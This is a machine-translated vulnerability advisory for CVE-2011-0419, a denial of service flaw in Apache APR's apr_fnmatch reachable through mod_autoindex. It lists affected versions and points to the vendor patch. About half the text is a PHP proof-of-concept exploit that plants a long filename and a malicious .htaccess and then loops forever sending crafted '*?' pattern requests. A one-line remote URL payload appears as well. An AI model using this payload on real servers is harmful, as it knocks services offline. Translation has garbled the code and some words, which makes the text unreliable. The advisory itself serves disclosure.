Apache APR "apr_fnmatch ()" Denial Of Service Vulnerability and repair

Release date:
Updated on:

Affected Systems:

NetBSD 4.x
Apache Group Apache Software Foundation 2.x
Apache Group APR 1.4.3
Apache Group APR 1.4.2

Unaffected system:

Apache Group Apache Software Foundation 2.2.18
Apache Group APR 1.4.4

Description:

--------------------------------------------------------------------------------

Bugtraq id: 47820
Cve id: CVE-2011-0419

The purpose of APR (Apache portable Run-time libraries, which can be transplanted to a Runtime Library) is as follows, it mainly provides an underlying support interface library for upper-layer applications that can be used across multiple operating system platforms.

Apache APR "apr_fnmatch ()" has a denial of service vulnerability. Remote attackers can exploit this vulnerability to cause denial of service.

<* Source: Maksymilian Arciemowicz (max@jestsuper.pl)
*>

Test method:

--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php
/*
Apache 2.2.17 mod_autoindex local/remote Denial of Service
Author: Maksymilian Arciemowicz

CVE-2011-0419 (CVE)
CWE: CWE-399

REMOTE
Find some directory with supported mod_autoindex on the server. The directory shocould contain long filenames.

Http: // [server]/[directory_with_mod_autoindex]/? P = *? *? *? [To 4 k]

LOCAL
Tested on:
127 # httpd-v & uname-
Server version: Apache/2.2.17 (Unix)
Server built: Dec 28 2010 13:21:44
NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org: /home/builds/AB/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/AB/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386

Result:
127 # ls-la
Total 8
Drwxrwxrwx 2 root wheel 512 Feb 8.
Drwxr-xr-x 7 www wheel 1024 Jan 31 ..
-Rw-r-1 www wheel 1056 Feb 8. htaccess
-Rw-r-1 www wheel 0 Feb 8 cx ........................................................................... ..................................................
-Rw-r-1 www wheel 1240 Feb 8 run. php
127 # ps-aux-p 617
User pid % CPU % MEM VSZ RSS TTY STAT STARTED TIME COMMAND
Www 617 98.6 0.4 10028 4004? R pm. 17/usr/pkg/sbin/httpd-k start

Time = 12:43 and counting

Where http: // [$ localhost]: [$ localport]/[$ localuri]
*/
$ Localhost = "localhost ";
$ Localport = 80;
$ Localuri = "/koniec /";

If (! Is_writable (".") die ("! Writable ");

// Phase 1
// Create some filename
Touch ("cx". str_repeat (".", 125 ));

// Phase 2
// Create. htaccess
Unlink ("./. htaccess ");
$ Htaccess = fopen ("./. htaccess", "");
Fwrite ($ htaccess, "AddDescription" CVE-2011-0419 ". str_repeat ('*.', 512 )."");
Fclose ($ htaccess );

// Phase 3
// Local connect (bypass firewall restriction)
While (1 ){
$ Fp = fsockopen ($ localhost, $ localport, $ errno, $ errstr, 30 );
If (! $ Fp) echo "$ errstr ($ errno) <br/> ";
Else {
$ Out = "GET". $ localuri ."/? P = ". str_repeat (" *? ", 1500). "* HTTP/1.1 ";
$ Out. = "Host:". $ localhost ."";
$ Out. = "Connection: Close ";
Fwrite ($ fp, $ out );
Fclose ($ fp );
}
}

?>

Suggestion:

--------------------------------------------------------------------------------

Vendor patch:

Apache Group
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://httpd.apache.org/